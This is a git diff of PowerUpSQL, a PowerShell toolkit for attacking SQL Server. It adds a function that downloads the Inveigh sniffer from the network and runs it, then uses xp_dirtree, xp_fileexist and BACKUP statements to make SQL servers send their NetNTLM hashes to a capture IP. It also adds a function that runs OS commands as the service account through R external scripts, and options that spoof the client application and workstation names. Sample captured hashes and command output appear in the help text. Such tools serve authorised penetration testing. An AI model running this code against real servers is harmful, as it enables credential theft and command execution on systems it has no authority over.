diff --git a/LICENSE b/LICENSE index bbda486..44d5389 100644 --- a/LICENSE +++ b/LICENSE @@ -2,7 +2,7 @@ PowerUpSQL is provided under the 3-clause BSD license below. ************************************************************* -Copyright (c) 2016, NetSPI +Copyright (c) 2024, NetSPI All rights reserved. Redistribution and use in source and binary forms, with or without diff --git a/PowerUpSQL.ps1 b/PowerUpSQL.ps1 index b2ad06d..c4f4acd 100644 --- a/PowerUpSQL.ps1 +++ b/PowerUpSQL.ps1 @@ -1,13 +1,12 @@ -#requires -Modules DnsClient, Microsoft.PowerShell.Utility -#requires -version 3 +#requires -version 2 <# File: PowerUpSQL.ps1 - Author: Scott Sutherland (@_nullbind), NetSPI - 2016 - Contributors: Antti Rantasaari and Eric Gruber - Version: 1.0.0.24 + Author: Scott Sutherland (@_nullbind), NetSPI - 2023 + Major Contributors: Antti Rantasaari and Eric Gruber + Version: 1.129 Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server. License: BSD 3-Clause - Required Dependencies: PowerShell v.3 + Required Dependencies: PowerShell v.2 Optional Dependencies: None #> @@ -22,7 +21,9 @@ # ---------------------------------- # Author: Scott Sutherland # Reference: https://msdn.microsoft.com/en-us/library/ms188247.aspx -Function Get-SQLConnectionObject +# Reference: https://raw.githubusercontent.com/sqlcollaborative/dbatools/master/functions/SharedFunctions.ps1 +# Reference: https://blogs.msdn.microsoft.com/spike/2008/11/14/connectionstrings-mixing-usernames-and-windows-authentication-who-goes-first/ +Function Get-SQLConnectionObject { <# .SYNOPSIS @@ -35,24 +36,32 @@ Function Get-SQLConnectionObject SQL Server credential. .PARAMETER Database Default database to connect to. + .PARAMETER AppName + Spoof the name of the application you are connecting to SQL Server with. + .PARAMETER WorkstationId + Spoof the name of the workstation/hostname you are connecting to SQL Server with. + .PARAMETER Encrypt + Use an encrypted connection. + .PARAMETER TrustServerCert + Trust the certificate of the remote server. .EXAMPLE - PS C:\> Get-SQLConnectionObject -Username MySQLUser -Password MySQLPassword - + PS C:\> Get-SQLConnectionObject -Username myuser -Password mypass -Instance server1 -Encrypt Yes -TrustServerCert Yes -AppName "myapp" StatisticsEnabled : False - AccessToken : - ConnectionString : Server=SQLServer1;Database=Master;User ID=MySQLUser;Password=MySQLPassword;Connection Timeout=1 + AccessToken : + ConnectionString : Server=server1;Database=Master;User ID=myuser;Password=mypass;Connection Timeout=1 ;Application + Name="myapp";Encrypt=Yes;TrustServerCertificate=Yes ConnectionTimeout : 1 Database : Master - DataSource : SQLServer1 + DataSource : server1 PacketSize : 8000 ClientConnectionId : 00000000-0000-0000-0000-000000000000 - ServerVersion : + ServerVersion : State : Closed - WorkstationId : SQLServer1 - Credential : + WorkstationId : Workstation1 + Credential : FireInfoMessageEventOnUserErrors : False - Site : - Container : + Site : + Container : #> [CmdletBinding()] Param( @@ -82,6 +91,24 @@ Function Get-SQLConnectionObject HelpMessage = 'Default database to connect to.')] [String]$Database, + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the application your connecting to the server with.')] + [string]$AppName = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the workstation/hostname your connecting to the server with.')] + [string]$WorkstationId = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Use an encrypted connection.')] + [ValidateSet("Yes","No","")] + [string]$Encrypt = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Trust the certificate of the remote server.')] + [ValidateSet("Yes","No","")] + [string]$TrustServerCert = "", + [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut = 1 @@ -104,6 +131,34 @@ Function Get-SQLConnectionObject { $Database = 'Master' } + + # Check if appname was provided + if($AppName){ + $AppNameString = ";Application Name=`"$AppName`"" + }else{ + $AppNameString = "" + } + + # Check if workstationid was provided + if($WorkstationId){ + $WorkstationString = ";Workstation Id=`"$WorkstationId`"" + }else{ + $WorkstationString = "" + } + + # Check if encrypt was provided + if($Encrypt){ + $EncryptString = ";Encrypt=Yes" + }else{ + $EncryptString = "" + } + + # Check TrustServerCert was provided + if($TrustServerCert){ + $TrustCertString = ";TrustServerCertificate=Yes" + }else{ + $TrustCertString = "" + } } Process @@ -117,36 +172,32 @@ Function Get-SQLConnectionObject # Create connection object $Connection = New-Object -TypeName System.Data.SqlClient.SqlConnection - # Check for username and password - if($Username -and $Password) - { - # Setup connection string with SQL Server credentials - $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut" - } - else - { - # Get connecting user - $UserDomain = [Environment]::UserDomainName - $Username = [Environment]::UserName - $ConnectionectUser = "$UserDomain\$Username" + # Set authentcation type - current windows user + if(-not $Username){ - # Status user - Write-Debug -Message "Attempting to authenticate to $DacConn$Instance as current Windows user ($ConnectionectUser)..." + # Set authentication type + $AuthenticationType = "Current Windows Credentials" + + # Set connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" + } + + # Set authentcation type - provided windows user + if ($username -like "*\*"){ + $AuthenticationType = "Provided Windows Credentials" - # Setup connection string with trusted connection - $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;Connection Timeout=1" + # Setup connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;uid=$Username;pwd=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" + } - <# - # Check for provided credential - if ($Credential){ + # Set authentcation type - provided sql login + if (($username) -and ($username -notlike "*\*")){ - $Username = $credential.Username - $Password = $Credential.GetNetworkCredential().Password + # Set authentication type + $AuthenticationType = "Provided SQL Login" - # Setup connection string with SQL Server credentials - $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut" - } - #> + # Setup connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" } # Return the connection object @@ -207,11 +258,21 @@ Function Get-SQLConnectionTest [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipeline, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'IP Address of SQL Server.')] + [string]$IPAddress, + + [Parameter(Mandatory = $false, + HelpMessage = 'IP Address Range In CIDR Format to Audit.')] + [string]$IPRange, + [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, @@ -240,14 +301,43 @@ Function Get-SQLConnectionTest Process { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } + # Split Demarkation Start ^ + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + if($IPRange -and $IPAddress) + { + if ($IPAddress.Contains(",")) + { + $ContainsValid = $false + foreach ($IP in $IPAddress.Split(",")) + { + if($(Test-Subnet -cidr $IPRange -ip $IP)) + { + $ContainsValid = $true + } + } + if (-not $ContainsValid) + { + Write-Warning "Skipping $ComputerName ($IPAddress)" + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') + return + } + } + + if(-not $(Test-Subnet -cidr $IPRange -ip $IPAddress)) + { + Write-Warning "Skipping $ComputerName ($IPAddress)" + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') + return + } + Write-Verbose "$ComputerName ($IPAddress)" + } # Setup DAC string if($DAC) @@ -354,11 +444,21 @@ Function Get-SQLConnectionTestThreaded [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipeline, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'IP Address of SQL Server.')] + [string]$IPAddress, + + [Parameter(Mandatory = $false, + HelpMessage = 'IP Address Range In CIDR Format to Audit.')] + [string]$IPRange, + [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, @@ -401,10 +501,15 @@ Function Get-SQLConnectionTestThreaded if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ - Instance = $Instance + Instance = $Instance; } } + if($Instance -and $IPAddress) + { + $ProvideInstance | Add-Member -Name "IPAddress" -Value $IPAddress + } + # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } @@ -421,10 +526,40 @@ Function Get-SQLConnectionTestThreaded $MyScriptBlock = { # Setup instance $Instance = $_.Instance + $IPAddress = $_.IPAddress # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + if($IPRange -and $IPAddress) + { + if ($IPAddress.Contains(",")) + { + $ContainsValid = $false + foreach ($IP in $IPAddress.Split(",")) + { + if($(Test-Subnet -cidr $IPRange -ip $IP)) + { + $ContainsValid = $true + } + } + if (-not $ContainsValid) + { + Write-Warning "Skipping $ComputerName ($IPAddress)" + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') + return + } + } + + if(-not $(Test-Subnet -cidr $IPRange -ip $IPAddress)) + { + Write-Warning "Skipping $ComputerName ($IPAddress)" + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') + return + } + Write-Verbose "$ComputerName ($IPAddress)" + } + # Setup DAC string if($DAC) { @@ -485,11 +620,11 @@ Function Get-SQLConnectionTestThreaded # Get-SQLQuery # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLQuery +Function Get-SQLQuery { <# .SYNOPSIS - Executes a query on target SQL servers.This + Executes a query on target SQL servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -510,6 +645,14 @@ Function Get-SQLQuery Number of concurrent threads. .PARAMETER Query Query to be executed on the SQL Server. + .PARAMETER AppName + Spoof the name of the application you are connecting to SQL Server with. + .PARAMETER WorkstationId + Spoof the name of the workstation/hostname you are connecting to SQL Server with. + .PARAMETER Encrypt + Use an encrypted connection. + .PARAMETER TrustServerCert + Trust the certificate of the remote server. .EXAMPLE PS C:\> Get-SQLQuery -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" -Query "Select @@version" -Threads 15 .EXAMPLE @@ -560,6 +703,24 @@ Function Get-SQLQuery HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the application your connecting to the server with.')] + [string]$AppName = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the workstation/hostname your connecting to the server with.')] + [string]$WorkstationId = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Use an encrypted connection.')] + [ValidateSet("Yes","No","")] + [string]$Encrypt = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Trust the certificate of the remote server.')] + [ValidateSet("Yes","No","")] + [string]$TrustServerCert = "", + [Parameter(Mandatory = $false, HelpMessage = 'Return error message if exists.')] [switch]$ReturnError @@ -577,12 +738,12 @@ Function Get-SQLQuery if($DAC) { # Create connection object - $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -DAC -Database $Database + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -DAC -Database $Database -AppName $AppName -WorkstationId $WorkstationId -Encrypt $Encrypt -TrustServerCert $TrustServerCert } else { # Create connection object - $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database -AppName $AppName -WorkstationId $WorkstationId -Encrypt $Encrypt -TrustServerCert $TrustServerCert } # Parse SQL Server instance name @@ -635,7 +796,7 @@ Function Get-SQLQuery } else { - Write-Output -InputObject 'No query provided to Get-SQLQuery function.' + Write-Host -InputObject 'No query provided to Get-SQLQuery function.' Break } } @@ -707,7 +868,7 @@ Function Get-SQLQueryThreaded [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipeline, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, @@ -847,6 +1008,249 @@ Function Get-SQLQueryThreaded # ######################################################################### + +# ---------------------------------- +# Invoke-SQLUncPathInjection +# ---------------------------------- +# Author: Scott Sutherland (@_nullbind) +# Updates: Thomas Elling +Function Invoke-SQLUncPathInjection { + + <# + .SYNOPSIS + Locates domain sql servers, loads inveigh, attempts login, and unc path injects to capture password hash of associated service account. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER CaptureIp + IP address for listening and packet sniffing. + .EXAMPLE + PS C:\> Invoke-SQLUncPathInjection -Verbose -CaptureIp 10.1.1.12 + VERBOSE: Inveigh loaded + VERBOSE: You have Administrator rights. + VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)... + VERBOSE: Parsing SQL Server instances from SPNs... + VERBOSE: 36 instances were found. + VERBOSE: Attempting to log into each instance... + ... + Cleartext NetNTLMv1 + --------- --------- + Server1$::demo.local:A0F2FF845622186D00000000000000000000000000000000:091B709EFB488SDFSDF525D526BB5DCAAFE352C88A818A... + Server1$::demo.local:FFAF3DA18451B1CA00000000000000000000000000000000:7C3296SDF07E0230B4EF7D892789EB5F0D3ED251C4186... + Workstation$::demo.local:3284525F0D2A495B00000000000000000000000000000000:EF6CAD0F2738000490FSDFE5628CC82DAE67BE92A77690CB... + NASServer1$::demo.local:432194457F8D1D6FA00000000000000000000000000000000:63EE53E0D93448BC003BB560F80ASDF72881B676B529174F... + SvcUser::demo.local:DC334ECBFDD018B700000000000000000000000000000000:98A367A3E26A6E0F99E9F3DBE427FA07B231A9F6DCD51A8F... + DBA::demo.local:875A296AAFEDA8BE00000000000000000000000000000000:DDA8D84AA3F79807DSDF7ECD648264187FBD7EB849128... + + .NOTES + alt domain user: runas /noprofile /netonly /user:domain\users powershell.exe + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory=$false)] + [string]$Username, + + [Parameter(Mandatory=$false)] + [string]$Password, + + [Parameter(Mandatory=$false)] + [string]$DomainController, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory=$true)] + [string]$CaptureIp, + + [Parameter(Mandatory=$false)] + [int]$TimeOut = 5, + + [Parameter(Mandatory=$false)] + [int]$Threads = 10 + + ) + + Begin + { + # Attempt to load Inveigh via reflection - naturally this bombs if there is no outbound internet. Exits if not loaded. + try { + Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1') -ErrorAction Stop + Write-Verbose "Inveigh loaded" + } catch { + $ErrorMessage = $_.Exception.Message + Write-Verbose "$ErrorMessage" + + # Check if Inveigh is loaded in memory + $Loaded = Test-Path -Path Function:\Invoke-Inveigh + if($Loaded -eq 'True') + { + Write-Verbose "Inveigh loaded." + }else{ + Write-Verbose "Inveigh NOT loaded. Ensure Inveigh is loaded." + break + } + } + + # Create table + $TblInveigh = New-Object -TypeName System.Data.DataTable + $null = $TblInveigh.Columns.Add('Cleartext') + $null = $TblInveigh.Columns.Add('NetNTLMv1') + $null = $TblInveigh.Columns.Add('NetNTLMv2') + } + + Process + { + + # Check if the current process has elevated privs + # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx + $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() + $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) + $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator + $IsAdmin = $prp.IsInRole($adm) + if (-not $IsAdmin) + { + Write-Verbose -Message "You do not have Administrator rights. Run this function in a privileged process for best results." + } + else + { + Write-Verbose -Message "You have Administrator rights." + + } + + # If SQL instances are not provided, autopug + if(-not $Instance) + { + # Discover SQL Servers on the Domain via LDAP queries for SPN records + $SQLServerInstances = Get-SQLInstanceDomain -verbose -DomainController $DomainController -Username $Username -Password $Password + } else { + # Test instances from pipeline and check connectivity + $SQLServerInstances = $Instance + } + + # Get list of SQL Servers that the provided account can log into + Write-Verbose -Message "Attempting to log into each instance..." + $AccessibleSQLServers = $SQLServerInstances | Get-SQLConnectionTestThreaded -Verbose -Threads $Threads | ? {$_.status -eq "Accessible"} + $AccessibleSQLServersCount = $AccessibleSQLServers.count + + # Status user + Write-Verbose -Message "$AccessibleSQLServersCount SQL Server instances can be logged into" + Write-Verbose -Message "Starting UNC path injections against $AccessibleSQLServersCount instances..." + + # Start sniffing + Write-Verbose -Message "Starting Invoke-Inveigh..." + Invoke-Inveigh -NBNS Y -MachineAccounts Y -IP $CaptureIp | Out-Null + + # Perform unc path injection on each one + $AccessibleSQLServers | + ForEach-Object{ + + # Get current instance + $CurrentInstance = $_.Instance + + # Randomized 5 character file name + $UncFileName = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) + + # Start unc path injection for each interface + Write-Verbose -Message "$CurrentInstance - Injecting UNC path to \\$CaptureIp\$UncFileName" + + # Functions executable by the Public role that accept UNC paths - SQL Server 2000 to 2008 + # https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version--edition-and-update-level-of-sql-server-a + + # Check version + $SQLVersionFull = Get-SQLServerInfo -Instance $CurrentInstance -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) + { + $SQLVersionShort = $SQLVersionFull.Split('.')[0] + } + + # Run the BACKUP commands for older version only (MS16-136) + if([int]$SQLVersionShort -le 11) + { + Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "BACKUP LOG [TESTING] TO DISK = '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null + Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "BACKUP DATABASE [TESTING] TO DISK = '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null + } + + # Functions executable by the Public role that accept UNC paths + Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "xp_dirtree '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null + Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "xp_fileexist '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null + + # Sleep to give the SQL Server time to send us hashes :) + sleep $TimeOut + + # Display stuff + Get-Inveigh -Cleartext | Sort-Object | + ForEach-Object { + Write-Verbose -Message " - Cleartext: $_" + } + + Get-Inveigh -NTLMv1 | Sort-Object | + ForEach-Object { + Write-Verbose -Message " - NetNTLMv1: $_" + } + + Get-Inveigh -NTLMv2 | Sort-Object | + ForEach-Object { + Write-Verbose -Message " - NetNTLMv2: $_" + } + } + } + + End + { + + # Get cleartext returned + Get-Inveigh -Cleartext | Sort-Object | + ForEach-Object { + + # Add records + [string]$NTLMv1 = "" + [string]$NTLMv2 = "" + [string]$Cleartext = $_ + $null = $TblInveigh.Rows.Add([string]$Cleartext, [string]$NTLMv1, [string]$NTLMv2) + } + + # Get NetNTLMv1 returned + Get-Inveigh -NTLMv1 | Sort-Object | + ForEach-Object { + + # Add records + [string]$NTLMv1 = $_ + [string]$NTLMv2 = "" + [string]$Cleartext = "" + $null = $TblInveigh.Rows.Add([string]$Cleartext, [string]$NTLMv1, [string]$NTLMv2) + } + + # Get NetNTLMv2 returned + Get-Inveigh -NTLMv2 | Sort-Object | + ForEach-Object { + + # Add records + [string]$NTLMv1 = "" + [string]$NTLMv2 = $_ + [string]$Cleartext = "" + $null = $TblInveigh.Rows.Add([string]$Cleartext, [string]$NTLMv1, [string]$NTLMv2) + } + + # Clear pw hash cache + Clear-Inveigh | Out-Null + + # Stop pw hash capture + Stop-Inveigh | Out-Null + + # Return results + $TblInveigh + + } +} + + # ---------------------------------- # Invoke-SQLOSCmd # ---------------------------------- @@ -977,7 +1381,7 @@ Function Invoke-SQLOSCmd [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipeline, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, @@ -1177,7 +1581,7 @@ Function Invoke-SQLOSCmd # Display results or add to final results table if($RawResults) { - $CmdResults + $CmdResults | Select output -ExpandProperty output } else { @@ -1227,15 +1631,18 @@ Function Invoke-SQLOSCmd } } + # ---------------------------------- -# Get-SQLServerInfo +# Invoke-SQLOSCmdR # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServerInfo +# Reference: https://pastebin.com/raw/zBDnzELT +Function Invoke-SQLOSCmdR { <# .SYNOPSIS - Returns basic server and user information from target SQL Servers. + Execute command on the operating system as the SQL Server service account using the R runtime language. + Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -1244,29 +1651,54 @@ Function Get-SQLServerInfo SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER Command + Operating command to be executed on the SQL Server. + .PARAMETER RawResults + Just show the raw results without the computer or instance name. .EXAMPLE - PS C:\> Get-SQLServerInfo -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami" + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04 : Connection Failed. + VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. + VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : external scripts are already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. + VERBOSE: Closing the runspace pool + + ComputerName Instance CommandResults + ------------ -------- -------------- + MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system + MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DomainName : Domain - ServiceName : MSSQL$STANDARDDEV2014 - ServiceAccount : LocalSystem - AuthenticationMode : Windows and SQL Server Authentication - Clustered : No - SQLServerVersionNumber : 12.0.4213.0 - SQLServerMajorVersion : 2014 - SQLServerEdition : Developer Edition (64-bit) - SQLServerServicePack : SP1 - OSArchitecture : X64 - OsMachineType : WinNT - OSVersionName : Windows 8.1 Pro - OsVersionNumber : 6.3 - Currentlogin : Domain\MyUser - IsSysadmin : Yes - ActiveSessions : 1 .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfo -Verbose + PS C:\> Invoke-SQLOSCmdR -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Command "whoami" -RawResults + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : External scripts are disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled external scripts. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling external scripts + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options + + nt authority\system + + VERBOSE: Closing the runspace pool #> [CmdletBinding()] Param( @@ -1284,259 +1716,45 @@ Function Get-SQLServerInfo [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $true, + HelpMessage = 'OS command to be executed.')] + [String]$Command = "whoami", + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 1, + [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] - [switch]$SuppressVerbose + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Just show the raw results without the computer or instance name.')] + [switch]$RawResults ) Begin { - # Table for output - $TblServerInfo = New-Object -TypeName System.Data.DataTable - } + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('CommandResults') - Process - { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } - - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return - } - - # Get number of active sessions for server - $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | - Where-Object -FilterScript { - $_.SessionStatus -eq 'running' - } | - Measure-Object -Line | - Select-Object -Property Lines -ExpandProperty Lines - - # Get sysadmin status - $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - - if($IsSysadmin -eq 'Yes') - { - # Grab additional information if sysadmin - $SysadminSetup = " - -- Get machine type - DECLARE @MachineType SYSNAME - EXECUTE master.dbo.xp_regread - @rootkey = N'HKEY_LOCAL_MACHINE', - @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', - @value_name = N'ProductType', - @value = @MachineType output - - -- Get OS version - DECLARE @ProductName SYSNAME - EXECUTE master.dbo.xp_regread - @rootkey = N'HKEY_LOCAL_MACHINE', - @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion', - @value_name = N'ProductName', - @value = @ProductName output" - - $SysadminQuery = ' @MachineType as [OsMachineType], - @ProductName as [OSVersionName],' - } - else - { - $SysadminSetup = '' - $SysadminQuery = '' - } - - # Define Query - $Query = " -- Get SQL Server Information - - -- Get SQL Server Service Name and Path - DECLARE @SQLServerInstance varchar(250) - DECLARE @SQLServerServiceName varchar(250) - if @@SERVICENAME = 'MSSQLSERVER' - BEGIN - set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' - set @SQLServerServiceName = 'MSSQLSERVER' - END - ELSE - BEGIN - set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) - set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250)) - END - - -- Get SQL Server Service Account - DECLARE @ServiceaccountName varchar(250) - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @SQLServerInstance, - N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' - - -- Get authentication mode - DECLARE @AuthenticationMode INT - EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', - N'Software\Microsoft\MSSQLServer\MSSQLServer', - N'LoginMode', @AuthenticationMode OUTPUT - - -- Grab additional information as sysadmin - $SysadminSetup - - -- Return server and version information - SELECT '$ComputerName' as [ComputerName], - @@servername as [Instance], - DEFAULT_DOMAIN() as [DomainName], - @SQLServerServiceName as [ServiceName], - @ServiceAccountName as [ServiceAccount], - (SELECT CASE @AuthenticationMode - WHEN 1 THEN 'Windows Authentication' - WHEN 2 THEN 'Windows and SQL Server Authentication' - ELSE 'Unknown' - END) as [AuthenticationMode], - CASE SERVERPROPERTY('IsClustered') - WHEN 0 - THEN 'No' - ELSE 'Yes' - END as [Clustered], - 